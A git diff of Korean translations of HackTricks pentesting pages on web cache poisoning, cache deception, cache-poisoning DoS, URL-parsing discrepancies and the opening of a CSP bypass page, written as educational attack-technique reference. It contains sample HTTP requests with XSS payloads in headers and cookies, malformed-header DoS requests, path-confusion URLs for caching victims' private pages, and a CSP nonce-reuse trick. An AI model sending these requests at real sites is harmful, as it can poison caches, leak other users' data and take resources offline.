-요청을 캐시할 때는 사용하는 헤더에 **주의해야** 합니다. 일부 헤더는 **예상치 않게** **키가 있는** 것으로 사용될 수 있으며, **피해자는 동일한 헤더를 사용해야** 합니다. 항상 **다양한 브라우저**로 캐시 오염을 **테스트**하여 작동하는지 확인하십시오.
+요청을 캐시할 때는 **사용하는 헤더에 주의**해야 합니다. 일부 헤더는 **예상치 않게** **키가 있는** 것으로 사용될 수 있으며, **피해자는 동일한 헤더를 사용해야 합니다**. 항상 **다양한 브라우저**로 캐시 오염을 **테스트**하여 작동하는지 확인하십시오.
 
 ## 악용 예시
 
 ### 가장 쉬운 예
 
-헤더 `X-Forwarded-For`가 응답에 소독되지 않고 반영되고 있습니다.\
-기본 XSS 페이로드를 보내고 캐시를 오염시켜 페이지에 접근하는 모든 사람이 XSS에 노출되도록 할 수 있습니다:
+헤더 `X-Forwarded-For`가 응답에 정화되지 않고 반영되고 있습니다.\
+기본 XSS 페이로드를 전송하고 캐시를 오염시켜 페이지에 접근하는 모든 사람이 XSS에 노출되도록 할 수 있습니다:
 ```markup
 GET /en?region=uk HTTP/1.1
 Host: innocent-website.com
 X-Forwarded-Host: a."><script>alert(1)</script>"
 ```
-_이 요청은 `/en?region=uk`에 대한 것이며 `/en`에 대한 것이 아닙니다._
+_이 요청은 `/en`이 아닌 `/en?region=uk`를 오염시킬 것입니다._
 
 ### DoS를 위한 캐시 오염
 
@@ -79,7 +79,7 @@ cache-poisoning-to-dos.md
 
 ### 쿠키 처리 취약점을 악용하기 위한 웹 캐시 오염 사용
 
-쿠키는 페이지의 응답에 반영될 수도 있습니다. 예를 들어, 이를 악용하여 XSS를 유발할 수 있다면, 악성 캐시 응답을 로드하는 여러 클라이언트에서 XSS를 악용할 수 있습니다.
+쿠키는 페이지의 응답에 반영될 수도 있습니다. 예를 들어, 이를 악용하여 XSS를 유발할 수 있다면, 악성 캐시 응답을 로드하는 여러 클라이언트에서 XSS를 악용할 수 있을 것입니다.
 ```markup
 GET / HTTP/1.1
 Host: vulnerable.com
@@ -87,9 +87,9 @@ Cookie: session=VftzO7ZtiBj5zNLRAuFpXpSQLjS4lBmU; fehost=asd"%2balert(1)%2b"
 ```
 취약한 쿠키가 사용자에 의해 많이 사용되는 경우, 정기적인 요청이 캐시를 정리할 것임을 유의하십시오.
 
-### 구분 기호, 정규화 및 점을 사용한 불일치 생성 <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
+### 구분 기호, 정규화 및 점을 사용하여 불일치 생성하기 <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
 
-확인:
+확인하십시오:
 
 {{#ref}}
 cache-poisoning-via-url-discrepancies.md
@@ -99,13 +99,13 @@ cache-poisoning-via-url-discrepancies.md
 
 [**이 글에서는**](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html) `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123`와 같은 URL로 OpenAI API 키를 훔칠 수 있었던 방법을 설명합니다. `/share/*`와 일치하는 모든 것이 Cloudflare가 URL을 정규화하지 않고 캐시되기 때문에, 요청이 웹 서버에 도달했을 때 정규화가 이루어졌습니다.
 
-이것은 다음에서 더 잘 설명됩니다:
+이것은 다음에서 더 잘 설명되어 있습니다:
 
 {{#ref}}
 cache-poisoning-via-url-discrepancies.md
 {{#endref}}
 
-### 웹 캐시 오염 취약점을 악용하기 위한 여러 헤더 사용 <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
+### 웹 캐시 오염 취약점을 악용하기 위한 여러 헤더 사용하기 <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
 
 때때로 **캐시를 악용하기 위해 여러 개의 키가 없는 입력을 악용해야** 할 필요가 있습니다. 예를 들어, `X-Forwarded-Host`를 귀하가 제어하는 도메인으로 설정하고 `X-Forwarded-Scheme`을 `http`로 설정하면 **Open redirect**를 찾을 수 있습니다. **서버**가 모든 **HTTP** 요청을 **HTTPS**로 **전달**하고 `X-Forwarded-Scheme` 헤더를 리디렉션을 위한 도메인 이름으로 사용하는 경우, 리디렉션에 의해 페이지가 가리키는 위치를 제어할 수 있습니다.
 ```markup
@@ -116,7 +116,7 @@ X-Forwarded-Scheme: http
 ```
 ### 제한된 `Vary` 헤더로 악용하기
 
-**`X-Host`** 헤더가 **JS 리소스를 로드하기 위한 도메인 이름**으로 사용되고 있지만, 응답의 **`Vary`** 헤더가 **`User-Agent`**를 나타내고 있다면, 피해자의 User-Agent를 유출하고 해당 User-Agent를 사용하여 캐시를 오염시킬 방법을 찾아야 합니다:
+**`X-Host`** 헤더가 **JS 리소스를 로드하는 도메인 이름**으로 사용되고 있지만, 응답의 **`Vary`** 헤더가 **`User-Agent`**를 나타내고 있다면, 피해자의 User-Agent를 유출하고 해당 User-Agent를 사용하여 캐시를 오염시킬 방법을 찾아야 합니다:
 ```markup
 GET / HTTP/1.1
 Host: vulnerbale.net
@@ -164,12 +164,67 @@ content-type 헤더에 잘못된 값을 보내면 405 캐시 응답이 발생했
 
 ### GitLab + GCP CP-DoS
 
-GitLab은 정적 콘텐츠를 저장하기 위해 GCP 버킷을 사용합니다. **GCP Buckets**는 **헤더 `x-http-method-override`**를 지원합니다. 따라서 헤더 `x-http-method-override: HEAD`를 보내고 캐시를 오염시켜 빈 응답 본문을 반환하도록 할 수 있었습니다. 또한 `PURGE` 메서드를 지원할 수 있었습니다.
+GitLab은 정적 콘텐츠를 저장하기 위해 GCP 버킷을 사용합니다. **GCP Buckets**는 **헤더 `x-http-method-override`**를 지원합니다. 따라서 헤더 `x-http-method-override: HEAD`를 보내고 캐시를 오염시켜 빈 응답 본문을 반환하도록 할 수 있었습니다. 또한 `PURGE` 메서드도 지원할 수 있었습니다.
 
 ### Rack Middleware (Ruby on Rails)
 
-Ruby on Rails 애플리케이션에서는 Rack 미들웨어가 자주 사용됩니다. Rack 코드의 목적은 **`x-forwarded-scheme`** 헤더의 값을 가져와 요청의 스킴으로 설정하는 것입니다. 헤더 `x-forwarded-scheme: http`가 전송되면 동일한 위치로 301 리디렉션이 발생하여 해당 리소스에 대한 서비스 거부(DoS)를 유발할 수 있습니다. 또한 애플리케이션은 `X-forwarded-host` 헤더를 인식하고 사용자를 지정된 호스트로 리디렉션할 수 있습니다. 이 동작은 공격자의 서버에서 JavaScript 파일을 로드하게 하여 보안 위험을 초래할 수 있습니다.
+Ruby on Rails 애플리케이션에서는 Rack 미들웨어가 자주 사용됩니다. Rack 코드의 목적은 **`x-forwarded-scheme`** 헤더의 값을 요청의 스킴으로 설정하는 것입니다. 헤더 `x-forwarded-scheme: http`가 전송되면 동일한 위치로 301 리디렉션이 발생하여 해당 리소스에 대한 서비스 거부(DoS)를 유발할 수 있습니다. 또한 애플리케이션은 `X-forwarded-host` 헤더를 인식하고 사용자를 지정된 호스트로 리디렉션할 수 있습니다. 이 동작은 공격자의 서버에서 JavaScript 파일을 로드하게 되어 보안 위험을 초래할 수 있습니다.
 
 ### 403 and Storage Buckets
 
-Cloud
+Cloudflare는 이전에 403 응답을 캐시했습니다. 잘못된 Authorization 헤더로 S3 또는 Azure Storage Blobs에 접근하려고 하면 403 응답이 캐시되었습니다. Cloudflare는 403 응답 캐싱을 중단했지만, 이 동작은 다른 프록시 서비스에서도 여전히 존재할 수 있습니다.
+
+### Injecting Keyed Parameters
+
+캐시는 종종 캐시 키에 특정 GET 매개변수를 포함합니다. 예를 들어, Fastly의 Varnish는 요청에서 `size` 매개변수를 캐시했습니다. 그러나 잘못된 값으로 URL 인코딩된 매개변수(예: `siz%65`)가 함께 전송되면 캐시 키는 올바른 `size` 매개변수를 사용하여 구성됩니다. 그러나 백엔드는 URL 인코딩된 매개변수의 값을 처리합니다. 두 번째 `size` 매개변수를 URL 인코딩하면 캐시에서 생략되지만 백엔드에서 사용됩니다. 이 매개변수에 0 값을 할당하면 캐시 가능한 400 Bad Request 오류가 발생합니다.
+
+### User Agent Rules
+
+일부 개발자는 서버 부하를 관리하기 위해 FFUF 또는 Nuclei와 같은 고트래픽 도구의 사용자 에이전트와 일치하는 요청을 차단합니다. 아이러니하게도, 이 접근 방식은 캐시 오염 및 DoS와 같은 취약점을 도입할 수 있습니다.
+
+### Illegal Header Fields
+
+[RFC7230](https://datatracker.ietf.mrg/doc/html/rfc7230)는 헤더 이름에 허용되는 문자를 지정합니다. 지정된 **tchar** 범위를 벗어난 문자가 포함된 헤더는 이상적으로 400 Bad Request 응답을 유발해야 합니다. 그러나 실제로 서버는 항상 이 표준을 준수하지 않습니다. 주목할 만한 예는 Akamai로, 유효하지 않은 문자가 포함된 헤더를 전달하고 `cache-control` 헤더가 없으면 400 오류를 캐시합니다. 불법 문자가 포함된 헤더를 보내면 캐시 가능한 400 Bad Request 오류가 발생하는 패턴이 발견되었습니다.
+
+### Finding new headers
+
+[https://gist.github.com/iustin24/92a5ba76ee436c85716f003dda8eecc6](https://gist.github.com/iustin24/92a5ba76ee436c85716f003dda8eecc6)
+
+## Cache Deception
+
+Cache Deception의 목표는 클라이언트가 **민감한 정보가 포함된 리소스를 캐시에 저장하도록 만드는 것입니다.**
+
+우선, **extensions**인 `.css`, `.js`, `.png` 등이 일반적으로 **캐시**에 **저장**되도록 **구성**되어 있다는 점에 유의하세요. 따라서 `www.example.com/profile.php/nonexistent.js`에 접근하면 캐시는 `.js` **extension**을 인식하여 응답을 저장할 가능성이 높습니다. 그러나 **application**이 _www.example.com/profile.php_에 저장된 **민감한** 사용자 콘텐츠로 **replaying**하는 경우, 다른 사용자로부터 해당 콘텐츠를 **훔칠** 수 있습니다.
+
+테스트할 다른 사항들:
+
+- _www.example.com/profile.php/.js_
+- _www.example.com/profile.php/.css_
+- _www.example.com/profile.php/test.js_
+- _www.example.com/profile.php/../test.js_
+- _www.example.com/profile.php/%2e%2e/test.js_
+- _덜 알려진 확장자 사용하기:_.avif
+
+또한, 이 글에서 매우 명확한 예를 찾을 수 있습니다: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712).\
+예제에서는 _http://www.example.com/home.php/non-existent.css_와 같은 존재하지 않는 페이지를 로드하면 _http://www.example.com/home.php_ (**사용자의 민감한 정보 포함**)의 내용이 반환되고 캐시 서버가 결과를 저장한다고 설명합니다.\
+그런 다음 **attacker**는 자신의 브라우저에서 _http://www.example.com/home.php/non-existent.css_에 접근하여 이전에 접근한 사용자의 **기밀 정보**를 관찰할 수 있습니다.
+
+**cache proxy**는 **extension**에 따라 파일을 **캐시**하도록 **구성**되어야 하며, 콘텐츠 유형에 따라 캐시되어서는 안 됩니다. 예제 _http://www.example.com/home.php/non-existent.css_는 `text/css` MIME 유형 대신 `text/html` 콘텐츠 유형을 가집니다(이는 _.css_ 파일에 대한 예상입니다).
+
+여기에서 [HTTP Request Smuggling을 악용하여 Cache Deceptions 공격을 수행하는 방법](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-deception)에 대해 알아보세요.
+
+## Automatic Tools
+
+- [**toxicache**](https://github.com/xhzeem/toxicache): URL 목록에서 웹 캐시 오염 취약점을 찾고 여러 주입 기술을 테스트하는 Golang 스캐너입니다.
+
+## References
+
+- [https://portswigger.net/web-security/web-cache-poisoning](https://portswigger.net/web-security/web-cache-poisoning)
+- [https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities](https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities)
+- [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712)
+- [https://youst.in/posts/cache-poisoning-at-scale/](https://youst.in/posts/cache-poisoning-at-scale/)
+- [https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)
+- [https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/](https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/)
+
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md b/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md
index 5cbab838d..9c9a234e5 100644
--- a/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md
+++ b/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md
@@ -7,7 +7,7 @@
 
 - **HTTP Header Oversize (HHO)**
 
-웹 서버가 지원하는 것보다 크지만 캐시 서버가 지원하는 것보다 작은 헤더 크기로 요청을 보냅니다. 웹 서버는 캐시될 수 있는 400 응답으로 응답할 것입니다:
+웹 서버가 지원하는 것보다 크지만 캐시 서버가 지원하는 것보다 작은 헤더 크기로 요청을 보냅니다. 웹 서버는 400 응답으로 응답할 것이며, 이는 캐시될 수 있습니다:
 ```
 GET / HTTP/1.1
 Host: redacted.com
@@ -21,9 +21,9 @@ GET / HTTP/1.1
 Host: redacted.com
 X-Meta-Hedear:Bad Chars\n \r
 ```
-잘못 구성된 헤더는 단순히 `\:`로 헤더가 될 수 있습니다.
+잘못 구성된 헤더는 단순히 `\:`로 헤더로 사용될 수 있습니다.
 
-예상치 못한 값이 전송되면, 예를 들어 예상치 못한 Content-Type:와 같은 경우에도 작동할 수 있습니다.
+예상치 못한 값이 전송되면, 예를 들어 예상치 못한 Content-Type:과 같은 경우에도 작동할 수 있습니다.
 ```
 GET /anas/repos HTTP/2
 Host: redacted.com
@@ -31,7 +31,7 @@ Content-Type: HelloWorld
 ```
 - **키가 없는 헤더**
 
-일부 웹사이트는 요청에 _X-Amz-Website-Location-Redirect: someThing_ 헤더와 같은 특정 헤더가 포함되어 있으면 오류 상태 코드를 반환합니다.
+일부 웹사이트는 요청에 _X-Amz-Website-Location-Redirect: someThing_ 헤더와 같은 특정 헤더가 **포함되어 있으면** 오류 상태 코드를 반환합니다.
 ```
 GET /app.js HTTP/2
 Host: redacted.com
@@ -52,7 +52,7 @@ HTTP-Method-Override: POST
 ```
 - **키가 없는 포트**
 
-Host 헤더의 포트가 응답에 반영되고 캐시 키에 포함되지 않는 경우, 사용되지 않는 포트로 리디렉션할 수 있습니다:
+호스트 헤더의 포트가 응답에 반영되고 캐시 키에 포함되지 않는 경우, 사용되지 않는 포트로 리디렉션할 수 있습니다:
 ```
 GET /index.html HTTP/1.1
 Host: redacted.com:1
@@ -80,7 +80,7 @@ CF-Cache-Status: miss
 ```
 - **호스트 헤더 대소문자 정규화**
 
-호스트 헤더는 대소문자를 구분하지 않아야 하지만 일부 웹사이트는 소문자로 되어 있기를 기대하며, 그렇지 않을 경우 오류를 반환합니다:
+호스트 헤더는 대소문자를 구분하지 않아야 하지만 일부 웹사이트는 소문자로 되어 있기를 기대하며 그렇지 않을 경우 오류를 반환합니다:
 ```
 GET /img.png HTTP/1.1
 Host: Cdn.redacted.com
@@ -105,7 +105,7 @@ Not Found
 ```
 - **Fat Get**
 
-일부 캐시 서버, 예를 들어 Cloudflare 또는 웹 서버는 본문이 있는 GET 요청을 중지하므로, 이를 악용하여 잘못된 응답을 캐시할 수 있습니다:
+일부 캐시 서버, 예를 들어 Cloudflare 또는 웹 서버는 본문이 있는 GET 요청을 중단하므로, 이를 악용하여 잘못된 응답을 캐시할 수 있습니다:
 ```
 GET /index.html HTTP/2
 Host: redacted.com
@@ -117,7 +117,7 @@ xyz
 HTTP/2 403 Forbidden
 Cache: hit
 ```
-## 참고 문헌
+## 참고문헌
 
 - [https://anasbetis023.medium.com/dont-trust-the-cache-exposing-web-cache-poisoning-and-deception-vulnerabilities-3a829f221f52](https://anasbetis023.medium.com/dont-trust-the-cache-exposing-web-cache-poisoning-and-deception-vulnerabilities-3a829f221f52)
 - [https://youst.in/posts/cache-poisoning-at-scale/?source=post_page-----3a829f221f52--------------------------------](https://youst.in/posts/cache-poisoning-at-scale/?source=post_page-----3a829f221f52--------------------------------)
diff --git a/src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md b/src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md
index 6d521d4d1..9797e85be 100644
--- a/src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md
+++ b/src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md
@@ -2,10 +2,10 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-이 문서는 캐시 프록시와 웹 서버 간의 불일치를 악용하여 캐시 오염 공격을 수행하기 위해 제안된 기술의 요약입니다 **캐시 서버가 정적 리소스가 로드되고 있다고 생각하게 만드는 것**입니다.
+이 문서는 캐시 프록시와 웹 서버 간의 불일치를 악용하여 캐시 오염 공격을 수행하기 위해 제안된 기술의 요약입니다 **캐시 오염 공격을 수행하기 위해.**
 
 > [!NOTE]
-> 이 공격의 목표는 **캐시 서버가 정적 리소스가 로드되고 있다고 생각하게 하여 캐시하도록 만드는 것**입니다. 캐시 서버는 경로의 일부를 캐시 키로 저장하지만 웹 서버는 다른 경로를 해결하여 응답합니다. 웹 서버는 사용자의 민감한 정보, XSS와 같은 악성 페이로드 또는 공격자의 웹사이트에서 JS 파일을 로드하도록 리디렉션하는 동적 페이지를 로드하는 실제 경로를 해결합니다.
+> 이 공격의 목표는 **캐시 서버가 정적 리소스가 로드되고 있다고 생각하게 만드는 것**입니다. 따라서 캐시 서버는 경로의 일부를 캐시 키로 저장하지만 웹 서버는 다른 경로를 해결하여 응답합니다. 웹 서버는 사용자의 민감한 정보, XSS와 같은 악성 페이로드 또는 공격자의 웹사이트에서 JS 파일을 로드하기 위해 리디렉션하는 동적 페이지를 로드하는 실제 경로를 해결합니다.
 
 ## 구분자
 
@@ -19,12 +19,12 @@
 다음 프로세스를 따라 다른 특정 구분자를 찾을 수 있습니다:
 
 - **1단계**: 캐시할 수 없는 요청을 식별하고 이를 사용하여 잠재적인 구분자가 있는 URL이 어떻게 처리되는지 모니터링합니다.
-- **2단계**: 경로에 임의의 접미사를 추가하고 서버의 응답을 비교하여 문자가 구분자로 작동하는지 확인합니다.
-- **3단계**: 임의의 접미사 앞에 잠재적인 구분자를 도입하여 응답이 변경되는지 확인하여 구분자 사용을 나타냅니다.
+- **2단계**: 경로에 무작위 접미사를 추가하고 서버의 응답을 비교하여 문자가 구분자로 작동하는지 확인합니다.
+- **3단계**: 무작위 접미사 앞에 잠재적인 구분자를 도입하여 응답이 변경되는지 확인하여 구분자 사용을 나타냅니다.
 
 ## 정규화 및 인코딩
 
-- **목적**: 캐시 및 원본 서버의 URL 파서는 엔드포인트 매핑 및 캐시 키를 추출하기 위해 URL을 정규화합니다.
+- **목적**: 캐시 및 원본 서버의 URL 파서는 엔드포인트 매핑 및 캐시 키를 위해 경로를 추출하기 위해 URL을 정규화합니다.
 - **프로세스**: 경로 구분자를 식별하고 문자를 디코딩하고 점 세그먼트를 제거하여 경로를 추출하고 정규화합니다.
 
 ### **인코딩**
@@ -36,17 +36,17 @@ Nginx, Node 및 CloudFront와 같은 다양한 HTTP 서버 및 프록시는 구
 ### 점 세그먼트
 
 점이 포함된 경로 정규화는 캐시 오염 공격에 매우 흥미롭습니다. 예를 들어, `/static/../home/index` 또는 `/aaa..\home/index`와 같은 경우, 일부 캐시 서버는 이러한 경로를 키로 사용하여 캐시할 수 있지만 다른 서버는 경로를 해결하고 `/home/index`를 캐시 키로 사용할 수 있습니다.\
-이전과 마찬가지로 이러한 종류의 요청을 보내고 `/home/index`에 대한 응답이 요청된 경로에서 수집된 응답인지 확인하는 것이 도움이 됩니다.
+이전과 마찬가지로 이러한 종류의 요청을 보내고 `/home/index`에 대한 응답이 이러한 경로가 요청될 때 전송된 응답인지 확인하는 것이 도움이 됩니다.
 
 ## 정적 리소스
 
-여러 캐시 서버는 응답이 정적이라고 식별되면 항상 캐시합니다. 이는 다음과 같은 이유 때문일 수 있습니다:
+여러 캐시 서버는 응답이 정적이라고 식별되면 항상 응답을 캐시합니다. 이는 다음과 같은 이유 때문일 수 있습니다:
 
 - **확장자**: Cloudflare는 다음 확장자를 가진 파일을 항상 캐시합니다: 7z, csv, gif, midi, png, tif, zip, avi, doc, gz, mkv, ppt, tiff, zst, avif, docx, ico, mp3, pptx, ttf, apk, dmg, iso, mp4, ps, webm, bin, ejs, jar, ogg, rar, webp, bmp, eot, jpg, otf, svg, woff, bz2, eps, jpeg, pdf, svgz, woff2, class, exe, js, pict, swf, xls, css, flac, mid, pls, tar, xlsx
 - 구분자와 정적 확장을 사용하여 동적 응답을 캐시하도록 강제할 수 있습니다. 예를 들어 `/home$image.png`에 대한 요청은 `/home$image.png`를 캐시하고 원본 서버는 `/home`으로 응답합니다.
 - **잘 알려진 정적 디렉토리**: 다음 디렉토리는 정적 파일을 포함하고 있으므로 그 응답은 캐시되어야 합니다: /static, /assets, /wp-content, /media, /templates, /public, /shared
 - 구분자, 정적 디렉토리 및 점을 사용하여 동적 응답을 캐시하도록 강제할 수 있습니다. 예를 들어 `/home/..%2fstatic/something`은 `/static/something`을 캐시하고 응답은 `/home`이 됩니다.
 - **정적 디렉토리 + 점**: `/static/..%2Fhome` 또는 `/static/..%5Chome`에 대한 요청은 그대로 캐시될 수 있지만 응답은 `/home`일 수 있습니다.
-- **정적 파일:** `/robots.txt`, `/favicon.ico`, `/index.html`과 같은 특정 파일은 항상 캐시됩니다. 이는 `/home/..%2Frobots.txt`와 같이 악용될 수 있으며, 캐시는 `/robots.txt`를 저장하고 원본 서버는 `/home`에 응답할 수 있습니다.
+- **정적 파일:** `/robots.txt`, `/favicon.ico`, `/index.html`과 같은 특정 파일은 항상 캐시됩니다. 이는 `/home/..%2Frobots.txt`와 같이 악용될 수 있으며, 캐시는 `/robots.txt`를 저장하고 원본 서버는 `/home`에 응답합니다.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/content-security-policy-csp-bypass/README.md b/src/pentesting-web/content-security-policy-csp-bypass/README.md
index d40118ac1..fb76e3863 100644
--- a/src/pentesting-web/content-security-policy-csp-bypass/README.md
+++ b/src/pentesting-web/content-security-policy-csp-bypass/README.md
@@ -16,16 +16,16 @@ Content-Security-policy: default-src 'self'; img-src 'self' allowed-website.com;
 ```xml
 <meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">
 ```
-### 헤더
+### Headers
 
 CSP는 다음 헤더를 사용하여 시행되거나 모니터링될 수 있습니다:
 
 - `Content-Security-Policy`: CSP를 시행합니다; 브라우저는 위반 사항을 차단합니다.
-- `Content-Security-Policy-Report-Only`: 모니터링에 사용됩니다; 위반 사항을 보고하지만 차단하지 않습니다. 사전 생산 환경에서 테스트하는 데 이상적입니다.
+- `Content-Security-Policy-Report-Only`: 모니터링에 사용됩니다; 위반 사항을 차단하지 않고 보고합니다. 사전 생산 환경에서 테스트하는 데 이상적입니다.
 
-### 리소스 정의
+### Defining Resources
 
-CSP는 활성 및 수동 콘텐츠 로딩의 출처를 제한하여 인라인 JavaScript 실행 및 `eval()` 사용과 같은 측면을 제어합니다. 정책의 예는:
+CSP는 활성 및 수동 콘텐츠 로딩의 출처를 제한하여 인라인 JavaScript 실행 및 `eval()` 사용과 같은 측면을 제어합니다. 정책의 예는 다음과 같습니다:
 ```bash
 default-src 'none';
 img-src 'self';
@@ -39,38 +39,38 @@ object-src 'none';
 ```
 ### 지시어
 
-- **script-src**: JavaScript에 대한 특정 출처를 허용하며, URL, 인라인 스크립트 및 이벤트 핸들러나 XSLT 스타일시트에 의해 트리거된 스크립트를 포함합니다.
+- **script-src**: JavaScript에 대한 특정 소스를 허용하며, URL, 인라인 스크립트 및 이벤트 핸들러나 XSLT 스타일시트에 의해 트리거된 스크립트를 포함합니다.
 - **default-src**: 특정 가져오기 지시어가 없을 때 리소스를 가져오기 위한 기본 정책을 설정합니다.
 - **child-src**: 웹 워커 및 임베디드 프레임 콘텐츠에 대한 허용된 리소스를 지정합니다.
 - **connect-src**: fetch, WebSocket, XMLHttpRequest와 같은 인터페이스를 사용하여 로드할 수 있는 URL을 제한합니다.
 - **frame-src**: 프레임에 대한 URL을 제한합니다.
-- **frame-ancestors**: 현재 페이지를 포함할 수 있는 출처를 지정하며, `<frame>`, `<iframe>`, `<object>`, `<embed>`, `<applet>`와 같은 요소에 적용됩니다.
-- **img-src**: 이미지에 대한 허용된 출처를 정의합니다.
-- **font-src**: `@font-face`를 사용하여 로드된 글꼴에 대한 유효한 출처를 지정합니다.
-- **manifest-src**: 애플리케이션 매니페스트 파일의 허용된 출처를 정의합니다.
-- **media-src**: 미디어 객체를 로드하기 위한 허용된 출처를 정의합니다.
-- **object-src**: `<object>`, `<embed>`, `<applet>` 요소에 대한 허용된 출처를 정의합니다.
+- **frame-ancestors**: 현재 페이지를 포함할 수 있는 소스를 지정하며, `<frame>`, `<iframe>`, `<object>`, `<embed>`, `<applet>`와 같은 요소에 적용됩니다.
+- **img-src**: 이미지에 대한 허용된 소스를 정의합니다.
+- **font-src**: `@font-face`를 사용하여 로드된 글꼴에 대한 유효한 소스를 지정합니다.
+- **manifest-src**: 애플리케이션 매니페스트 파일의 허용된 소스를 정의합니다.
+- **media-src**: 미디어 객체를 로드하기 위한 허용된 소스를 정의합니다.
+- **object-src**: `<object>`, `<embed>`, `<applet>` 요소에 대한 허용된 소스를 정의합니다.
 - **base-uri**: `<base>` 요소를 사용하여 로드할 수 있는 허용된 URL을 지정합니다.
 - **form-action**: 폼 제출을 위한 유효한 엔드포인트를 나열합니다.
-- **plugin-types**: 페이지에서 호출할 수 있는 mime 유형을 제한합니다.
+- **plugin-types**: 페이지가 호출할 수 있는 mime 유형을 제한합니다.
 - **upgrade-insecure-requests**: 브라우저에 HTTP URL을 HTTPS로 재작성하도록 지시합니다.
 - **sandbox**: `<iframe>`의 sandbox 속성과 유사한 제한을 적용합니다.
-- **report-to**: 정책이 위반될 경우 보고서가 전송될 그룹을 지정합니다.
-- **worker-src**: Worker, SharedWorker 또는 ServiceWorker 스크립트에 대한 유효한 출처를 지정합니다.
-- **prefetch-src**: 가져오거나 미리 가져올 리소스에 대한 유효한 출처를 지정합니다.
+- **report-to**: 정책이 위반될 경우 보고서를 보낼 그룹을 지정합니다.
+- **worker-src**: Worker, SharedWorker 또는 ServiceWorker 스크립트에 대한 유효한 소스를 지정합니다.
+- **prefetch-src**: 가져오거나 미리 가져올 리소스에 대한 유효한 소스를 지정합니다.
 - **navigate-to**: 문서가 어떤 수단으로든 탐색할 수 있는 URL을 제한합니다 (a, form, window.location, window.open 등).
 
-### 출처
+### 소스
 
 - `*`: `data:`, `blob:`, `filesystem:` 스킴을 제외한 모든 URL을 허용합니다.
 - `'self'`: 동일한 도메인에서 로드를 허용합니다.
 - `'data'`: 데이터 스킴을 통해 리소스를 로드할 수 있도록 허용합니다 (예: Base64 인코딩된 이미지).
-- `'none'`: 어떤 출처에서도 로드를 차단합니다.
+- `'none'`: 어떤 소스에서도 로드를 차단합니다.
 - `'unsafe-eval'`: `eval()` 및 유사한 메서드의 사용을 허용하지만 보안상의 이유로 권장되지 않습니다.
 - `'unsafe-hashes'`: 특정 인라인 이벤트 핸들러를 활성화합니다.
 - `'unsafe-inline'`: 인라인 `<script>` 또는 `<style>`과 같은 인라인 리소스의 사용을 허용하지만 보안상의 이유로 권장되지 않습니다.
 - `'nonce'`: 암호화된 nonce(한 번 사용되는 숫자)를 사용하는 특정 인라인 스크립트에 대한 화이트리스트입니다.
-- JS 실행이 제한된 경우, `doc.defaultView.top.document.querySelector("[nonce]")`를 사용하여 페이지 내에서 사용된 nonce를 가져오고 이를 재사용하여 악성 스크립트를 로드할 수 있습니다 (strict-dynamic이 사용되는 경우, 허용된 출처는 새로운 출처를 로드할 수 있으므로 필요하지 않습니다), 예를 들어:
+- JS 제한 실행이 있는 경우, `doc.defaultView.top.document.querySelector("[nonce]")`를 사용하여 페이지 내에서 사용된 nonce를 가져오고 이를 재사용하여 악성 스크립트를 로드할 수 있습니다 (strict-dynamic이 사용되는 경우, 허용된 소스는 새로운 소스를 로드할 수 있으므로 필요하지 않습니다), 예를 들어:
 
 <details>
 
@@ -161,7 +161,7 @@ JS 파일을 업로드할 수 있다면 이 CSP를 우회할 수 있습니다:
 ```
 그러나 서버가 **업로드된 파일을 검증하고** 특정 유형의 파일만 **업로드하도록 허용할 가능성이 높습니다**.
 
-게다가, 서버에서 허용하는 확장자를 가진 파일에 **JS 코드를 포함하여** 업로드할 수 있다고 하더라도(예: _script.png_) 이는 충분하지 않습니다. 왜냐하면 아파치 서버와 같은 일부 서버는 **확장자에 따라 파일의 MIME 유형을 선택하고**, Chrome과 같은 브라우저는 **이미지여야 하는 것 안의 Javascript** 코드를 **실행하는 것을 거부하기 때문입니다**. "다행히도", 실수가 있습니다. 예를 들어, CTF에서 배운 바에 따르면 **Apache는** _**.wave**_ 확장자를 알지 못하므로 **audio/\***와 같은 **MIME 유형으로 제공하지 않습니다**.
